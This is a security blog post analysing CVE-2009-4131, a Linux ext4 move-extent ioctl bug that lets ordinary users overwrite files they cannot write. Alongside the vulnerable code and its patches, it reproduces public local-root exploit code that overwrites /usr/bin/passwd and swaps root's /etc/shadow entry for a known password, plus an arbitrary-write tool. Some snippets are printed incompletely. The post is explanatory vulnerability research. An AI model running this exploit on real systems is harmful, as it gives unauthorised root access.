xorl %eax, %eax

CVE-2009-4131: Linux kernel EXT4 IOCTL Insufficient Checks


A couple of weeks ago, this bug was being discussed everywhere. Unfortunately, I didn’t have time to blog about it then. Anyway, here is my delayed post…
The vulnerability was discovered by Akira Fujita of NEC on 7 December 2009 and it affects Linux kernel releases prior to 2.6.32-git6. Here is the buggy code as seen in fs/ext4/ioctl.c of the 2.6.31 release of the Linux kernel.

long ext4_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
        struct inode *inode = filp->f_dentry->d_inode;
        struct ext4_inode_info *ei = EXT4_I(inode);
        unsigned int flags;

        ext4_debug("cmd = %u, arg = %lu\n", cmd, arg);

        switch (cmd) {

So, this is the main IOCTL handler routine for the EXT4 filesystem. If we move to the ‘EXT4_IOC_MOVE_EXT’ command (which is used to exchange the specified range of a file), we’ll see this:

        case EXT4_IOC_MOVE_EXT: {
                struct move_extent me;
                struct file *donor_filp;
                int err;

                if (copy_from_user(&me,
                        (struct move_extent __user *)arg, sizeof(me)))
                        return -EFAULT;

This is simple code that copies the user-controlled argument into a ‘move_extent’ structure, which is in turn defined in fs/ext4/ext4.h like this:

struct move_extent {
        __u32 reserved;         /* should be zero */
        __u32 donor_fd;         /* donor file descriptor */
        __u64 orig_start;       /* logical start offset in block for orig */
        __u64 donor_start;      /* logical start offset in block for donor */
        __u64 len;              /* block length to be moved */
        __u64 moved_len;        /* moved block length */
};
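As a quick sanity check of that layout, here is a minimal user-space sketch. It assumes the fixed-width types from <stdint.h> can stand in for the kernel’s __u32/__u64; the names move_extent_layout, MOVE_EXT_REQUEST and the two helper functions are mine and do not exist in the kernel. The request encoding is the same _IOWR('f', 15, …) that the user-space sources quoted later in this post use.

```c
#include <stddef.h>
#include <stdint.h>
#include <linux/ioctl.h>

/* Hypothetical user-space mirror of the kernel's struct move_extent. */
struct move_extent_layout {
	uint32_t reserved;     /* should be zero */
	uint32_t donor_fd;     /* donor file descriptor */
	uint64_t orig_start;   /* logical start offset in block for orig */
	uint64_t donor_start;  /* logical start offset in block for donor */
	uint64_t len;          /* block length to be moved */
	uint64_t moved_len;    /* moved block length */
};

/* Illustrative name; same encoding as the EXT4_IOC_MOVE_EXT define below. */
#define MOVE_EXT_REQUEST _IOWR('f', 15, struct move_extent_layout)

/* Size of the argument structure as encoded in the request number. */
static unsigned int move_ext_encoded_size(void)
{
	return _IOC_SIZE(MOVE_EXT_REQUEST);
}

/* Command number as encoded in the request number. */
static unsigned int move_ext_encoded_nr(void)
{
	return _IOC_NR(MOVE_EXT_REQUEST);
}
```

The two 32-bit fields pack into the first eight bytes, so the four 64-bit fields follow without padding and the whole structure is copied to and from user space in one piece.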

If we move back to our IOCTL command, the code will continue like this:

                donor_filp = fget(me.donor_fd);
                if (!donor_filp)
                        return -EBADF;

                if (!capable(CAP_DAC_OVERRIDE)) {
                        if ((current->real_cred->fsuid != inode->i_uid) ||
                                !(inode->i_mode & S_IRUSR) ||
                                !(donor_filp->f_dentry->d_inode->i_mode &
                                S_IRUSR)) {
                                return -EACCES;
                        }
                }

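It initializes ‘donor_filp’ from the donor file descriptor in the user-controlled argument using fget(). Unless the caller has the ‘CAP_DAC_OVERRIDE’ (override all DAC access) capability, it then checks only that the caller owns the original file and that the owner-read bit is set on both files. The next code to be executed is: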

                err = ext4_move_extents(filp, donor_filp, me.orig_start,
                                        me.donor_start, me.len, &me.moved_len);

                if (!err)
                        if (copy_to_user((struct move_extent *)arg,
                                &me, sizeof(me)))
                                return -EFAULT;
                return err;

If execution reaches this point, it invokes ext4_move_extents() and then releases the donor file descriptor. Finally, if no error code was returned, the updated ‘me’ structure is copied back to user space.
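To make the gap in the permission test easier to see, here is a small user-space model of it. This is only a sketch: the function old_move_ext_check() and its parameters are hypothetical names of mine, and it simply replays the conditions from the kernel snippet above on plain values instead of on real inodes and credentials.

```c
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/types.h>

/*
 * Hypothetical model of the pre-patch test in EXT4_IOC_MOVE_EXT.
 * Returns true when the ioctl would have been allowed to proceed.
 */
static bool old_move_ext_check(bool has_dac_override, uid_t caller_fsuid,
			       uid_t orig_uid, mode_t orig_mode,
			       mode_t donor_mode)
{
	if (has_dac_override)
		return true;            /* capability skips every test */
	if (caller_fsuid != orig_uid)
		return false;           /* caller must own the original file */
	if (!(orig_mode & S_IRUSR))
		return false;           /* owner-read bit on the original */
	if (!(donor_mode & S_IRUSR))
		return false;           /* owner-read bit on the donor */
	return true;                    /* nothing asked about write access */
}
```

For example, a caller with fsuid 1000 who owns a 0644 original file passes this test against a donor with mode 04755, no matter who owns the donor.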
Now here are the three fixes that Akira Fujita made on this IOCTL command…

1. In current EXT4_IOC_MOVE_EXT, there are read access mode checks for
original and donor files, but they allow the illegal write access to
donor file, since donor file is overwritten by original file data.  To
fix this problem, change access mode checks of original (r->r/w) and
donor (r->w) files.

Well, this is probably the most important one from a security point of view. To remove this arbitrary write access, the following code was added for the original file:

                int err;
+               if (!(filp->f_mode & FMODE_READ) ||
+                   !(filp->f_mode & FMODE_WRITE))
+                       return -EBADF;
                if (copy_from_user(&me,
                        (struct move_extent __user *)arg, sizeof(me)))
                        return -EFAULT;

That returns “Bad File Descriptor” if the original file was not opened for both reading and writing. And for the donor file:

                donor_filp = fget(me.donor_fd);
                if (!donor_filp)
                        return -EBADF;
-               if (!capable(CAP_DAC_OVERRIDE)) {
-                       if ((current->real_cred->fsuid != inode->i_uid) ||
-                               !(inode->i_mode & S_IRUSR) ||
-                               !(donor_filp->f_dentry->d_inode->i_mode &
-                               S_IRUSR)) {
-                               fput(donor_filp);
-                               return -EACCES;
-                       }
+               if (!(donor_filp->f_mode & FMODE_WRITE)) {
+                       err = -EBADF;
+                       goto mext_out;
+               }

The capability check was removed and new code was added to check that the donor file is open for writing before attempting to write to it. Because of these missing checks, a user could write to files even without write access to them, since nothing checked for that!
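A rough user-space analogue of the two new f_mode tests looks like the sketch below. It assumes that the access mode reported by fcntl(F_GETFL) is a fair stand-in for the kernel’s FMODE_READ/FMODE_WRITE flags; the helper names fd_is_read_write() and fd_is_writable() are mine.

```c
#include <fcntl.h>
#include <stdbool.h>

/*
 * True if fd was opened for both reading and writing
 * (analogue of the FMODE_READ + FMODE_WRITE test on the original file).
 */
static bool fd_is_read_write(int fd)
{
	int flags = fcntl(fd, F_GETFL);

	return flags != -1 && (flags & O_ACCMODE) == O_RDWR;
}

/*
 * True if fd was opened with write access
 * (analogue of the FMODE_WRITE test on the donor file).
 */
static bool fd_is_writable(int fd)
{
	int flags = fcntl(fd, F_GETFL);
	int acc;

	if (flags == -1)
		return false;           /* invalid descriptor */
	acc = flags & O_ACCMODE;
	return acc == O_WRONLY || acc == O_RDWR;
}
```

The point of checking the open mode rather than the inode permission bits is that the open() call already went through the normal permission checks, so a descriptor opened O_RDONLY can no longer be used as a donor.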

2.  Disallow the use of donor files that have a setuid or setgid bits.

Another important fix. You could write to any file on the system, even SETUID/SETGID files, regardless of your actual file access modes. To fix this one, mext_check_arguments() (from fs/ext4/move_extent.c) was updated to include this code:

+       if (donor_inode->i_mode & (S_ISUID|S_ISGID)) {
+               ext4_debug("ext4 move extent: suid or sgid is set"
+                          " to donor file [ino:orig %lu, donor %lu]\n",
+                          orig_inode->i_ino, donor_inode->i_ino);
+               return -EINVAL;
+       }
        /* Ext4 move extent does not support swapfile */

This is a common inode mode check against the SUID/SGID flags. The final bugfix in this EXT4 IOCTL command was…

3.  Call mnt_want_write() and mnt_drop_write() before and after
ext4_move_extents() calling to get write access to a mount.

That translates to:

-               me.moved_len = 0;
+               err = mnt_want_write(filp->f_path.mnt);
+               if (err)
+                       goto mext_out;
                err = ext4_move_extents(filp, donor_filp, me.orig_start,
                                        me.donor_start, me.len, &me.moved_len);
-               fput(donor_filp);
+               mnt_drop_write(filp->f_path.mnt);
+               if (me.moved_len > 0)
+                       file_remove_suid(donor_filp);

As you have probably imagined, this one isn’t that important from a security perspective in comparison to the other two.
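The mode-bit side of fixes 2 and 3 can be sketched in user space as follows. The first helper mirrors the (S_ISUID|S_ISGID) test added to mext_check_arguments(). The second is only my rough model of what stripping the privilege bits after a write amounts to (setuid always, setgid only when group-execute is set); treat that rule as an assumption and not as kernel code. Both function names are hypothetical.

```c
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Mirrors the new donor test: either bit set means the donor is refused. */
static bool donor_mode_rejected(mode_t mode)
{
	return (mode & (S_ISUID | S_ISGID)) != 0;
}

/*
 * Assumed model of removing privilege bits from a file that was written:
 * setuid is always dropped, setgid only together with group-execute.
 */
static mode_t mode_after_suid_removal(mode_t mode)
{
	mode &= ~(mode_t)S_ISUID;
	if (mode & S_IXGRP)
		mode &= ~(mode_t)S_ISGID;
	return mode;
}
```

With these, a 04755 file such as a typical setuid binary is refused as a donor, and the same mode would come out as 0755 after the privilege bits are stripped.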
This trivial vulnerability was exploited by countless people, but spender published his exploit, which you can download here.
The exploit is driven by a BASH shell script (ext4_own.sh), which is this:

if [ ! -f ./passwd.bak ]; then
  cp /usr/bin/passwd ./passwd.bak
cc -o ext4 ext4.c
cc -o modify_shadow modify_shadow.c
strip ./modify_shadow
echo "replacing /etc/shadow..."
echo "flushing cache..."
grep blah -r -l /usr/share 1> /dev/null 2> /dev/null
echo "enjoy your new root account, password is \"password\", old shadow file saved as /etc/shadow-!"
su - root

This script checks whether the ‘passwd.bak’ file is present and copies ‘/usr/bin/passwd’ to that file if it isn’t. It then compiles the ext4.c and modify_shadow.c files, which are part of the exploit, and executes the ext4 executable. Finally, it flushes the cache using sync(1), performs a grep(1) whose purpose I didn’t understand at first (spender’s explanation is at the end of this post), and then executes ‘/usr/bin/passwd’, which now runs ‘modify_shadow’ as you’ll see below. It ends by switching to the root user using su(1).
The ext4.c file is also quite simple… Apart from these:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <linux/falloc.h>

struct move_extent {
	unsigned int reserved;
	unsigned int donor_fd;
	unsigned long long orig_start;
	unsigned long long donor_start;
	unsigned long long len;
	unsigned long long moved_len;
};

#define EXT4_IOC_MOVE_EXT	_IOWR('f', 15, struct move_extent)

You can find this code:

int main(void)
	struct move_extent mvext;
	struct stat st;
	int fd1, fd2;
	int len;
	char *buf;
	char *mem;

	fd1 = open("/usr/bin/passwd", O_RDONLY);
	fd2 = open("./modify_shadow", O_RDONLY);

	stat("./modify_shadow", &st);

	mvext.reserved = 0;
	mvext.donor_fd = fd1;
	mvext.orig_start = 0;
	mvext.donor_start = 0;
	mvext.len = st.st_blocks;
	mvext.moved_len = 0;

	ioctl(fd2, EXT4_IOC_MOVE_EXT, &mvext);

	return 0;	

In a few words, he sets the donor file descriptor to ‘/usr/bin/passwd’ and the original file to ‘./modify_shadow’; note that both files are opened with O_RDONLY. Because of the previously discussed bug, and since both starting offsets are 0, the contents of ‘./modify_shadow’ end up in ‘/usr/bin/passwd’. Let’s have a look at the other source code file now…

#include <stdio.h>

int main(void)
	FILE *f, *f2;
	char buf[1024];

	f = fopen("/etc/shadow", "r");
	f2 = fopen("/etc/shadow-", "w+");
	while (fgets(buf, sizeof(buf) - 1, f))
		fprintf(f2, "%s", buf);

	f = fopen("/etc/shadow-", "r");
	f2 = fopen("/etc/shadow", "w+");
	while (fgets(buf, sizeof(buf) - 1, f)) {
		if (!strncmp(buf, "root:", 5))
			fprintf(f2, "root:$1$pg5XXts7$EsWE/0AktuZ2K91946enD.:14443::::::\n");
			fprintf(f2, "%s", buf);

	return 0;

This is also straightforward. He first backs up ‘/etc/shadow’ to ‘/etc/shadow-’ and then finds the “root” entry in ‘/etc/shadow’ and replaces it with a hardcoded one whose password is ‘password’, as the “echo” in ext4_own.sh says. That was spender’s exploit for CVE-2009-4131.
More recently, fotisl blogged about this bug too. He also included code which you can download here. Once again, apart from the expected…

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#define __USE_GNU
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <linux/fs.h>
#include <linux/fiemap.h>

struct move_extent {
    int orig_fd;
    int donor_fd;
    uint64_t orig_start;
    uint64_t donor_start;
    uint64_t len;
    uint64_t moved_len;
};

#define EXT4_IOC_MOVE_EXT   _IOWR('f', 15, struct move_extent)

#define EXTENT_MAX_COUNT    512

The code opens up the two files based on arguments passed to the program like this:

int main(int argc, char **argv)
    char *orig, *donor;
    struct move_extent me;
    int donorfd, origfd;
    int off, len;

    if(argc != 5) {
        printf("Usage: %s <orig> <donor> <offset> <len>\n", argv[0]);
    orig = argv[1];
    donor = argv[2];
    off = atoi(argv[3]);
    len = atoi(argv[4]);

    if((donorfd = open(donor, O_RDONLY | O_EXCL)) < 0) {
        perror("open donor");

    if((origfd = open(orig, O_RDONLY | O_EXCL)) < 0) {
        perror("open orig");

The arguments include the offset and the length, so I’m assuming that this is more of a simple ‘EXT4_IOC_MOVE_EXT’ user space application, but because of the EXT4 implementation it can easily be used to perform arbitrary writes to files. After opening the donor and original files, it continues like this:

    printf("orig extents: %i\n", getextents(origfd));
    printf("donor extents: %i\n", getextents(donorfd));

getextents() is a function provided in ext4movext.c that returns the number of extents that were mapped, like this:

int getextents(int fd)
{
    struct stat stbuf;
    struct fiemap *fmap;
    int extents;

    /* Room for the header plus up to EXTENT_MAX_COUNT extent records. */
    if((fmap = malloc(sizeof(*fmap) + EXTENT_MAX_COUNT *
                    sizeof(struct fiemap_extent))) == NULL) {
        return -1;
    }

    /* The file size bounds the range we ask FIEMAP to map. */
    if(fstat(fd, &stbuf) < 0) {
        free(fmap);
        return -1;
    }

    fmap->fm_start = 0;
    fmap->fm_length = stbuf.st_size;
    fmap->fm_flags = 0;
    fmap->fm_extent_count = EXTENT_MAX_COUNT;

    if(ioctl(fd, FS_IOC_FIEMAP, fmap) < 0) {
        free(fmap);
        return -1;
    }

    extents = fmap->fm_mapped_extents;
    free(fmap);

    return extents;
}
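If only the number of extents is needed, FIEMAP can also be asked for the count alone by passing fm_extent_count = 0, in which case no extent array has to be allocated. The following is a minimal sketch of that variant and not fotisl’s code; the function name count_extents() is mine.

```c
#include <string.h>
#include <sys/ioctl.h>
#include <linux/fs.h>
#include <linux/fiemap.h>

/* Returns the number of extents mapped for fd, or -1 on error. */
static int count_extents(int fd)
{
	struct fiemap fmap;

	memset(&fmap, 0, sizeof(fmap));
	fmap.fm_start = 0;
	fmap.fm_length = FIEMAP_MAX_OFFSET;  /* cover the whole file */
	fmap.fm_extent_count = 0;            /* count only, no extent array */

	if (ioctl(fd, FS_IOC_FIEMAP, &fmap) < 0)
		return -1;

	return (int)fmap.fm_mapped_extents;
}
```

Unlike the version above, this one is not capped at EXTENT_MAX_COUNT, since the kernel only reports how many extents it would have returned.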

Finally, the IOCTL call takes place…

    me.orig_fd = origfd;
    me.donor_fd = donorfd;
    me.orig_start = off;
    me.donor_start = off;
    me.len = len;
    me.moved_len = 0;

    if(ioctl(origfd, EXT4_IOC_MOVE_EXT, &me) < 0) {

    printf("moved len = %li\n", me.moved_len);


    return 0;

After a quick conversation with spender on twitter, he explained to me the grep(1) use that I did not understand. Here is his explanation in his own words (I’m just pasting it here since that is more convenient, because it wasn’t in a single tweet):
spender’s reply:
For the changes you make via the ioctl to be visible immediately, you need to flush various caches in the kernel. On normal distros (ones using ext4) /usr/share will be quite large — 2GB on my machine. The grep is effectively used to read files. This causes the file/page caches to flush, then following that /usr/bin/passwd when executed will finally reflect its new content. Otherwise, as fotisl was having the problem, you would need to remount or reboot the machine to see the reflected changes.
end of spender’s reply.
Even though I disagree with him on numerous subjects, I have to publicly thank him for this response.
Thanks spender.

Written by xorl

January 1, 2010 at 07:59

Posted in linux, vulnerabilities

One Response


  1. Thanks this helped me in Offsec ;)


    October 24, 2014 at 03:55
